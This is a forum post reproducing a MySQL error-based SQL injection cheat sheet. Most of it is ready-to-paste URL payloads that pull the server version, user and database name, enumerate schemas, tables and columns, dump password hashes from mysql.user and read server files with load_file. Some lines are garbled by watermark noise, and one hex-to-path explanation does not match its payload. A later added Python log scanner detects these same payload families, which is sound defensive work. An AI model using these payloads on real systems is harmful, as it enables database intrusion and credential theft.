This post was last edited by Nightmare on 2013-3-17 14:20.
MySQL error-based injection reference (PDF), one post per day...
MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; it works on the vast majority of 5.x versions.
A few versions raise an error when name_const() is used; for those, use the Method.2 payloads given below.
Query the version:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)
Query the current user:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n with successive values.
, z, I+ t3 X+ ~" ], B爆指定库数目:2 n" N3 L) `8 o) p0 Z7 f
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t5 N# e; P0 {1 [+ R2 f# i
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
1 }( [& u: O! c5 N! r" p+by+x)a)+and+1=1 0x6D7973716C=mysql9 Z; W: U% q8 e6 i
Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql. Replace n with successive values.
Count the columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with successive values.
Dump contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with successive values.
Dump file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69 = C:\\boot.ini. Because only 64 bytes of content can be shown per error, use substring() to control which bytes are displayed.
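As an added defender-side example (not part of the original post): the payloads above share a few stable shapes, so a web-log scanner can flag them. This Python script, run over constructed sample log lines, URL-decodes each request's query string, matches the three families (the name_const join, the count(*)/floor(rand(0)*2)/group by duplicate-key trick, and load_file()), and decodes the 0x hex literals so an analyst can see which schema, table or path the request named.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): one benign request,
# then three requests carrying the payload families from the reference above.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Mar/2013:14:20:01] "GET /item.php?id=7 HTTP/1.1" 200',
    '10.0.0.9 - - [17/Mar/2013:14:20:02] "GET /item.php?id=7+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) HTTP/1.1" 500',
    '10.0.0.9 - - [17/Mar/2013:14:20:03] "GET /item.php?id=7+and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500',
    '10.0.0.9 - - [17/Mar/2013:14:20:04] "GET /item.php?id=7+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500',
]

# (label, pattern) pairs, run against the URL-decoded query string of each request.
SIGNATURES = [
    ("name_const duplicate column",
     re.compile(r"name_const\s*\(.+\)\s*\w+\s+join\s*\(\s*select\s+name_const", re.I | re.S)),
    ("rand(0) duplicate key",
     re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(.*floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    ("load_file read", re.compile(r"load_file\s*\(", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
HEX_RE = re.compile(r"0x([0-9a-f]+)\b", re.I)  # MySQL hex string literal such as 0x6D7973716C

def query_string(log_line):
    """Return the URL-decoded query string of the logged request ('' if there is none)."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return ""
    return unquote_plus(m.group(1).split("?", 1)[1])

def classify(log_line):
    """Labels of every signature matched by the request on this log line."""
    qs = query_string(log_line)
    return [label for label, pat in SIGNATURES if pat.search(qs)]

def decode_hex_literals(text):
    """Decode 0x... literals so the analyst sees which schema, table or path was named."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(text) if len(h) % 2 == 0]

def scan(lines):
    """Return (line_no, labels, decoded hex literals) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        labels = classify(line)
        if labels:
            hits.append((n, labels, decode_hex_literals(query_string(line))))
    return hits

if __name__ == "__main__":
    for n, labels, lits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}", lits or "")
```

The same three patterns, with the `rand(0)` family paired with a 500 status or a reflected "Duplicate entry" error in the response, are the signal to alert on; suppressing verbose database errors in the application removes the channel these payloads depend on.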
F4 u9 }4 p: n# P1 J6 O% d( UThx for reading.
It is fine not to download it, too.